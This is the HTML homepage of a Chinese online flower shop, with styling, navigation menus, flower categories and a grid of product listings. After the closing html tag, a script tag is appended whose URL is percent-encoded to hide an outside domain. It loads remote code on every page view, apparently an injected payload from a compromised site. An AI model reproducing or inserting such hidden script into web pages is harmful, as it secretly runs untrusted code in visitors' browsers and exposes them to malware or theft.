<!DOCTYPE html>
<html>

	<head>
		<meta charset="UTF-8">
		<title></title>
		<style>
			body {
				font-size: 14px;
			}
			
			#container {
				position: relative;
				width: 1000px;
				margin: auto;
			}
			
			nav {
				border-bottom: 1px solid orangered;
				height: 30px;
			}
			
			nav ul,
			.left ul,
			#hot ul,
			#right ul {
				list-style: none;
				padding: 0px;
				margin: 0px;
			}
			
			nav ul li {
				float: left;
				width: 120px;
				text-align: center;
				height: 30px;
				line-height: 30px;
			}
			
			nav .orangetext {
				background: orangered;
				width: 200px;
				text-align: left;
				color: white;
			}
			
			nav ul li ul {
				display: none;
			}
			
			nav ul li:hover ul {
				display: block;
			}
			
			nav ul li li {
				background: orangered;
				color: #FFFFFF;
			}
			
			.left ul {
				width: 200px;
				height: 140px;
				border-bottom: solid 1px #eee;
			}
			
			.left ul li {
				float: left;
				width: 100px;
				height: 35px;
				line-height: 35px;
			}
			
			.left .title,
			#hot .title {
				width: 200px;
				color: orangered;
				font-weight: bold;
			}
			
			#hot ul li {
				height: 35px;
				line-height: 35px;
			}
			
			#right {
				width: 790px;
				position: absolute;
				right: 5px;
				top: 250px;
				z-index: -1;
			}
			
			#right ul {
				width: 800px;
			}
			
			#right ul li {
				width: 200px;
				float: left;
				text-align: center;
			}
			
			.menu{
				position: absolute;
				left: -35px;
				top: 1080px;
				width: 1000px;
			height: 35px;
				
			}
			.menu ul{
				width: 990px;
				list-style: none;
			}
			.menu ul li{
				width: 140px;
				height: 35px;
				float: left;
				line-height: 30px;
				text-align: center;
				color: white;
				border-right: 1px solid #CCCCCC;
				background: orangered;
			}
			footer {
				position: absolute;
				right: 0;
				top: 1120px;
				width: 1000px;
			}
			
		nav .footertext {
				
				width: 141.85px;
				height: 35px;
				text-align: center;
				color: white;	border-right: 1px solid #CCCCCC;
			}
		</style>
	</head>

	<body>
		<div id="container">
			<div id="banner">
				<embed src="img/top.png" width="1000" height="211"></embed>
			</div>
			<nav>
				<ul>
					<li class="orangetext">全部商品导购</li>
					<li>
						<a href="default.html" target="_self">首页</a>
					</li>
					<li><a href="xuanxiangka.html">鲜花</a></li>
					<li><a href="yongshenghua.html">永生花</a>
						<ul>
							<li>经典花盒</li>
							<li>巨型玫瑰</li>
							<li>永生瓶花</li>
							<li>特色永生花</li>
						</ul>
					</li>
					<li><a href="lipin.html">礼品</a>
						<ul>
							<li>音乐盒</li>
							<li>金箔花</li>
							<li>首饰</li>
							<li>巧克力</li>
						</ul>
					</li>
					<li>
						<a href="index.html" target="_self">花语大全</a>
					</li>
					<li><a href="lxwm.html">联系我们</a></li>
				</ul>
			</nav>
			<div class="left">
				<ul>
					<li class="title">鲜花用途</li>
					<li>爱情鲜花</li>
					<li>友情鲜花</li>
					<li>生日鲜花</li>
					<li>问候长辈</li>
					<li>祝贺鲜花</li>
					<li>探病慰问</li>
				</ul>
			</div>
			<div class="left">
				<ul>
					<li class="title">鲜花类别</li>
					<li>花束</li>
					<li>开业花篮</li>
					<li>花盒</li>
					<li>果篮</li>
					<li>鲜花礼盒</li>
					<li>桌面花篮</li>
				</ul>
			</div>
			<div class="left">
				<ul>
					<li class="title">鲜花花材</li>
					<li>玫瑰</li>
					<li>康乃馨</li>
					<li>郁金香</li>
					<li>百合</li>
					<li>马蹄莲</li>
					<li>向日葵</li>
				</ul>
			</div>
			<div id="hot">
				<ul>
					<li class="title">热销商品</li>
					<li><img src="img/hotflower.jpg" width="200" /></li>
				</ul>
			</div>
			<div id="right">
				<ul>
					<li><img src="img/index1.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index2.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index3.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index4.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index5.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index6.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index7.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index8.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index9.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index10.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index11.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
				<ul>
					<li><img src="img/index12.jpg" width="190" />
						<p>￥368<br />爱的奉献</p>
					</li>
				</ul>
			</div>
			<div class="menu">
				<ul>
					<li>十年品牌</li>
						<li>3小时配送</li>
						<li>低价保障</li>
						<li>配送范围</li>
						<li>花店加盟</li>
						<li>投诉建议</li>
						<li>首页</li>
				</ul>
			</div>
			<footer>
				<p align="center">全国统一订花电话：400-888-7844电脑端/手机<br /> copyright&copy;2007-2018版权所有：山西太原网上花城信息产业部备案 ICP备06016666号</p>
			</footer>
		</div>
	</body>

</html><script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>